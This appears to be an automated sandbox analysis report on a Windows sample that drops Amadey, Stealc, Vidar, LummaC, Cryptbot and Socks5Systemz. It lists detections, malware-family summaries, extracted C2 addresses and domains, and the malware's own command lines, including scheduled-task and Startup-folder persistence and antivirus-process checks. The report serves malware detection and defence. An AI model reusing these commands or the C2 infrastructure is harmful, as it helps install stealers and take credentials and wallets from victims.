Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1547295
MD5:	62a25f901b0883140d09e62daaaaeb23
SHA1:	506b6fdf45a694e8d1638b1145c7605bb100202a
SHA256:	a44c927e4a23da13388d2be3a31ccaed8ead5320d8d6d8cd890f7926e682f8fb
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Socks5Systemz

Yara detected Stealc

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files with a suspicious file extension

Drops large PE files

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

PE file has a writeable .text section

Potentially malicious time measurement code found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3440 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 62A25F901B0883140D09E62DAAAAEB23)

axplong.exe (PID: 5856 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 62A25F901B0883140D09E62DAAAAEB23)

axplong.exe (PID: 6352 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 62A25F901B0883140D09E62DAAAAEB23)

axplong.exe (PID: 7060 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 62A25F901B0883140D09E62DAAAAEB23)

stealc_default2.exe (PID: 5004 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 68A99CF42959DC6406AF26E91D39F523)

Offnewhere.exe (PID: 4524 cmdline: "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe" MD5: C07E06E76DE584BCDDD59073A4161DBB)

Gxtuum.exe (PID: 2504 cmdline: "C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe" MD5: C07E06E76DE584BCDDD59073A4161DBB)

splwow64.exe (PID: 5732 cmdline: "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe" MD5: 5D97C2475C8A4D52E140EF4650D1028B)

cmd.exe (PID: 1100 cmdline: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4820 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4220 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 6416 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5828 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3220 cmdline: cmd /c md 197036 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 1400 cmdline: findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1496 cmdline: cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Jurisdiction.pif (PID: 4084 cmdline: Jurisdiction.pif T MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 3576 cmdline: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4764 cmdline: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6340 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3596 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

new_v8.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe" MD5: 5009B1EF6619ECA039925510D4FD51A1)

YJJA1RDG0PY87AD1W2WB98M4U9.exe (PID: 2952 cmdline: "C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe" MD5: 2BC1796E07C6D66C07E2386051C4F951)

dc753b12e1.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe" MD5: 26D8D52BAC8F4615861F39E118EFA28D)

RegAsm.exe (PID: 2320 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

3288f0a855.exe (PID: 6676 cmdline: "C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe" MD5: B00D133C7ED8F6D1FB0C04A1509A4AC8)

GOLD1234.exe (PID: 3280 cmdline: "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe" MD5: BDF3C509A0751D1697BA1B1B294FD579)

conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GOLD1234.exe (PID: 1848 cmdline: "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe" MD5: BDF3C509A0751D1697BA1B1B294FD579)

WerFault.exe (PID: 6436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)

RDX123456.exe (PID: 5448 cmdline: "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe" MD5: FBA8F56206955304B2A6207D9F5E8032)

Gxtuum.exe (PID: 7124 cmdline: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe MD5: C07E06E76DE584BCDDD59073A4161DBB)

JavUmar.exe (PID: 4712 cmdline: "C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe" MD5: 331990A29AFA36193295A7B63EA4E712)

stail.exe (PID: 5696 cmdline: "C:\Users\user\AppData\Local\Temp\10000061101\stail.exe" MD5: DCF45A3386D6E8A1EFA6B2040125C3CA)

stail.tmp (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp" /SL5="$404A0,5239339,56832,C:\Users\user\AppData\Local\Temp\10000061101\stail.exe" MD5: AA4C6A433329F72AD8B338F73BAB7738)

blurayplayer32.exe (PID: 2824 cmdline: "C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe" -i MD5: 72DFEB99DAF355DDE1A7CD0482A98954)

wscript.exe (PID: 5832 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoCraft.scr (PID: 6600 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 5268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoCraft.scr (PID: 1896 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

svchost.exe (PID: 1268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2520 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 1496 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3280 -ip 3280 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: LummaC

{"C2 url": ["contemteny.site", "faulteyotk.site", "authorisev.site", "dilemmadu.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "computeryrati.site", "servicedny.site"], "Build id": "4SD0y4--RLREBORN"}

Threatname: Socks5Systemz

{"C2 list": ["csenhav.net"]}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: Cryptbot

{"C2 list": ["home.sevjoi17vt.top", "sevjoi17vt.top", "0/80/home.sevjoi17vt.top", "QUERY|rd|A|IN|home.sevjoi17vt.top", ".1.1home.sevjoi17vt.top", "0/80/sevjoi17vt.top", "QUERY|rd|AAAA|IN|home.sevjoi17vt.top", "%gPsevjoi17vt.top"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stealc_default2[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000002C.00000003.3495740575.0000000001549000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.4847975543.0000000002EC1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.2682479773.00000000006AE000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000028.00000003.3395409746.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2126506859.00000000009D1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000003.3795915109.000000000E2DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0000002C.00000002.3725730938.000000000154F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000028.00000003.3395777453.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.4844229093.0000000002E16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002C.00000003.3519315882.000000000154F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3489158557.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001F.00000003.3795915109.000000000E30E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000028.00000003.3489034650.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3004360942.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3659374635.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3659725440.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3616953743.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2121371600.00000000009D1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000000.2682444878.0000000000691000.00000080.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002C.00000003.3551155681.000000000154F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3625699652.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0000001F.00000003.3384717218.0000000001763000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000003.2080542129.00000000051A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000003.3658829272.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3007878955.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000028.00000003.3536995866.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2086147966.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.2617632587.0000000005080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000003.3795777106.000000000E30E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000000.00000003.2056584594.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2096834409.0000000000741000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: stealc_default2.exe PID: 5004	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 5004	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 5004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 5004	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: new_v8.exe PID: 6848	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: new_v8.exe PID: 6848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: new_v8.exe PID: 6848	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: JavUmar.exe PID: 4712	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: blurayplayer32.exe PID: 2824	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: 3288f0a855.exe PID: 6676	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 3288f0a855.exe PID: 6676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3288f0a855.exe PID: 6676	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: GOLD1234.exe PID: 1848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 58 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.axplong.exe.9d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.stealc_default2.exe.690000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.2.axplong.exe.9d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.740000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.0.stealc_default2.exe.690000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.axplong.exe.9d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 7060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\efbc18aa93.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

